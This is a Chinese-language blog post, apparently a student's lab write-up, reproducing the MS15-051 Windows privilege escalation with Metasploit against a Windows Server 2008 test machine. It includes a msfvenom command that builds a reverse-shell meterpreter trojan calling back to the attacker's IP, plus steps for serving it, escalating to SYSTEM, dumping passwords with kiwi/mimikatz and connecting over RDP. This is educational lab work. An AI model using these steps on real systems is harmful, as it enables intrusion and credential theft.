ms15-051漏洞復現

本文首發於個人我的博客，記錄了我在實驗室學習滲透測試所作的第三個實驗，以此文記錄，但願能對您有所幫助。

若是文章哪裏有錯，請去點擊個人我的博客連接進行覈對（多是轉移博客時候出錯了），也能夠在評論區留言告知。

前言

Metasploit

Metasploit是一款開源的滲透測試工具，能夠幫助安全員發現漏洞問題，此工具帶有的攻擊模塊能夠幫助安全員簡單的利用相關的漏洞。

實驗目的

本實驗經過Metasploit對內網機器進行滲透，而且使用ms15-051進行權限提高，獲取Window Server 2008的SYSTEM權限，最後進行遠程控制。

實驗原理

Metasploit框架使Metasploit具備良好的擴展性，它的控制接口負責發現漏洞、攻擊漏洞、提交漏洞，而後經過一些接口加入攻擊後處理工具和報表工具。Metasploit框架能夠從一個漏洞掃描程序導入數據，使用關於有漏洞主機的詳細信息來發現可攻擊漏洞，而後使用有效載荷對系統發起攻擊。全部這些操做均可以經過Metasploit的Web界面進行管理，而它只是其中一種管理接口，另外還有命令行工具和一些商業工具等。攻擊者能夠將漏洞掃描程序的結果導入到Metasploit框架的開源安全工具Armitage中，而後經過Metasploit的模塊來肯定漏洞。一旦發現了漏洞，攻擊者就能夠採起一種可行方法攻擊系統，經過Shell或啓動Metasploit的meterpreter來控制這個系統。這些有效載荷就是在得到本地系統訪問後執行的一系列命令。這個過程須要參考一些文檔並使用一些數據庫技術，在發現漏洞以後開發一種可行的攻擊方法，其中有效載荷數據庫包含用於提取本地系統密碼、安裝其餘軟件或控制硬件等的模塊，這些功能很象之前BO2K等工具所具有的功能。

漏洞CVE-2015-1701

受影響的系統：

• Windows Vista
• WIndows Server 2012 R2
• WIndows Server 2012
• WIndows Server 2008 R2
• WIndows Server 2008
• WIndows Server 2003
• WIndows RT 8.1
• Windows RT
• Windows 8.1
• Windows 8
• Windows 7

漏洞成因：Win32.k.sys內核模式驅動程序沒有正確處理內存對象，在實現上存在權限提高漏洞

漏洞危害：成功利用此漏洞可以使攻擊者在內核模式中運行任意代碼。

漏洞利用：攻擊者必須具備有效的登錄憑證，而且能夠本地登陸以利用此漏洞。

實驗環境

攻擊機：Kali Linux

靶機：Windows Server 2008

實驗步驟

1. 使用msfvenom生成木馬

   msfvenom -p windows/meterpreter/reverse_tcp lhost=攻擊機IP lport=4444 -f exe > shell.exe

2. 安裝xampp，並啓動。（我安裝在了/opt下）
   

3. 把生成的木馬掛在服務器上等待靶機下載

   在opt/lampp/htdocs/下建立目錄shell，提高shell及其全部文件和子目錄的權限爲全部人可讀可寫可執行。chmod命令用法。
   

4. 把生成的木馬複製到網站目錄

5. 使用msf的handler模塊
   

6. 設置payload及其參數

   payload要和木馬的payload一致（即windows/meterpreter/reverse_tcp）

   
   

7. 從新啓動網站

   不要關閉原來的終端，新建終端，從新啓動網站。

8. 打開靶機windows server 2008，訪問http://攻擊機IP/shell，下載木馬shell.exe（先將該網站加入受信任的站點）。下載完成後，運行。

9. 返回攻擊機，已成功獲取靶機的shell，getuid可查看當前權限

11. 使用ms15-051漏洞，進一步獲取system更高權限

    首先輸入backgroud，把會話切換進後臺，以後：

12. 設置payload及其參數

13. 鍵入run以攻擊，getuid以並查看當前權限。

    攻擊成功，而且當前已經是SYSTEM用戶。靶機的IP地址爲192.168.227.130（後面要用）。

14. 加載kiwi，獲取用戶密碼

    若是是windows server 2003，則加載mimikatz，由於我用的靶機爲windows server 2008，所以須要用kiwi。其餘系統你能夠先加載mimikatz，根據提示選擇你要加載什麼（下圖中，我最早加載的是mimikatz，它提示我應該使用kiwi來代替）。

    由於我沒有給用戶設置密碼，因此Password一列均爲空（這裏其實須要設置密碼的，後面會講到）。

15. 遠程鏈接靶機

    首先在windows server 2008進行以下設置，容許運行任意版本遠程桌面的計算機鏈接。

    而後回到攻擊機，新建一個終端，輸入rdesktop 靶機IP，遠程鏈接靶機。

    因爲rdesktop不支持無密碼登陸，所以我此時並不能使用用戶名zxy登陸。因此只能先返回windows，在服務管理器中爲用戶名爲zxy的用戶設置密碼。

    再次返回攻擊機，使用rdesktop命令遠程鏈接主機，點擊「其餘用戶」，輸入用戶名zxy和剛剛設置的密碼後，鏈接成功：

16. 成功入侵靶機，查看IP和用戶。

    至此，實驗已所有結束。